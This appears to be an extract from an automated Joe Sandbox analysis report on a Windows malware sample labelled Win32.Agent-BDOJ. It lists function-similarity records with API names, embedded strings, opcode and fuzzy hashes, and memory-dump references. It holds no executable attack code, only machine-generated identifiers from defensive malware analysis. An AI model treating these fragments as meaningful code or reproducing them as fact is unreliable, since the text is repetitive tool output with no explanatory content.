                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031E821619AC145FA21EB20E4907EAA355EF84BE8F800272EE6D477CDDF3CD6458721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerErrorLastName
                                                                                                                                                                                                                              • String ID: socket.gethostname
                                                                                                                                                                                                                              • API String ID: 3560734967-2650736202
                                                                                                                                                                                                                              • Opcode ID: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                              • Instruction ID: f8f01552f5c23cc7677dd5f78d991a63ff230a5553faa859a5b2382d54a329c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3313E61B0CB4386EB249BA1A85437E73A5FF89BD5F460435D94E866A4DF3CE044CB0A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_ntop
                                                                                                                                                                                                                              • String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
                                                                                                                                                                                                                              • API String ID: 448242623-2822559286
                                                                                                                                                                                                                              • Opcode ID: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                              • Instruction ID: 6a9e4dddeb31176e394991ec63e866a97ba02e3d46d6b2bd9d3d15af934bfa83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2311C61A2CA87D1EB608BA1E8507BD63A0FF89BC4F424432D54E93B64DF3CE449C716
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: getsockopt
• String ID: getsockopt buflen out of range$ii|i:getsockopt
• API String ID: 3272894102-2750947780
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: gethostbyname
• String ID: et:gethostbyname_ex$idna$socket.gethostbyname
• API String ID: 930432418-574663143
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: inet_pton
• String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
• API String ID: 1350483568-903159468
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D107
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: b646dc32fdc2b01716099ffc340b7a1ed4211f84c7692e1b8b8c957dbdd4d13a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F510772F0421186FB14EF749A957BCA7A1EB68368F900277DD1E52AEDDB3CA402C611
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: cec8a74ef634075d583b2d591895f3102ba968675d24564c1a9b005a7a1d460a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF517A62E086418AFB10EFB1D4503BDA7B5EB68B58F908576DE0D5B688DF3CD4408762
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 116b9c171df06c3b699768c802153cc3758b5bc8230ba9d9a71ca4fcbbf4221e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B811C631A0C54242F754E76AE5C437A9392EB98788FC44072DB4907B8DCD7DE9C58222
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                              • Instruction ID: 05cb45cef1c45c317905b990150ba65e84717481f746c0136568e8f6017485d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F111822B14B018AEB008FA0E8543AC33A4FB59798F440A31DA6D867A8DF7CD154C345
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction ID: d9cd9b7bc61391cace1ad6055a30a35423f7646f5771dd58d4478f56b082e81d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35111C32B14F058AFB00DB60E8543B973A8FB59758F840E32DA6D467A8DF78D1588351
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                              • API String ID: 1666080152-118859582
                                                                                                                                                                                                                              • Opcode ID: d53d6f7ddc0b937121d58bd9f7a70022747d411cd2a28debb74a18ce98306501
                                                                                                                                                                                                                              • Instruction ID: 53bb32ebc6aa9e0c6269495bf1b92b518b1d32396af8bce54209d329a6f269b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d53d6f7ddc0b937121d58bd9f7a70022747d411cd2a28debb74a18ce98306501
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0451E621F0C68255FB659BD6E8067BE6291AF84FC4F544835DE2D577C6DE3CE8828302
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
• Instruction ID: 0832f63381606b910b54b91cc4a58b1e48be86c60960d9c6e05e0e605ec3dc26
• Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
• Instruction Fuzzy Hash: 01412922A0828242FB60EB25D50577AE760EB81BA4F944276EE5C07ADDFF3CD441C721
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD19046
  • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
  • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7EAD0CBA5), ref: 00007FF7EAD19064
Strings
• C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, xrefs: 00007FF7EAD19052
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
• API String ID: 3580290477-3707282323
• Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
• Instruction ID: 09989019731bc11d295b86d517404659dbd2b4d5995e343ae4d049c5235a4405
• Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
• Instruction Fuzzy Hash: F3418C72A08A0286FB15EF31D8402BDA7A4EB55790B9540B6E94E47B99DE3CE4C1C322
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction ID: a2595562d678dce318dea90b3f32f44ee078f15d798888efe63efa9cfaa06a50
• Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction Fuzzy Hash: BD41D632B18B5181EB60DF25E4443BAABA5FB98B84F804132EE4D87798EF3CD401CB51
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
• Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
Similarity
• API ID: 00007F906026570
• String ID: _constructors$openssl_
• API String ID: 1666080152-3359357282
• Opcode ID: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
• Instruction ID: f8ed5b5d63f9e061501d17fa6fa5ae923730e2668367e1ce64926075b646c41d
• Opcode Fuzzy Hash: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
• Instruction Fuzzy Hash: EF31F722A09B0287EE258B95A99433D27A4BF49FD1F094035CE5D027E5EF3CE4858B4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
• API String ID: 0-402823876
• Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
• Instruction ID: 637ae8e2184f675c9b26383262a2017bc611067d541c150cbcca8fb9bdf573bf
• Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D31E620B09A8242FB55ABB5E8563FD2291FF887C4F884135DA2C477C6EF3CE1918302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007E6784124
                                                                                                                                                                                                                              • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                              • API String ID: 2720604592-4266787399
                                                                                                                                                                                                                              • Opcode ID: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                              • Instruction ID: a0a0a5b0f6ed0af8f26d8e8cc4f7a16471a6c668f150110a02e2893a720bc1eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5314922A0CB8287EA20CB95E45037E63A0FB89BC4F444231DE9D47BD4DF7CE0458B06
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
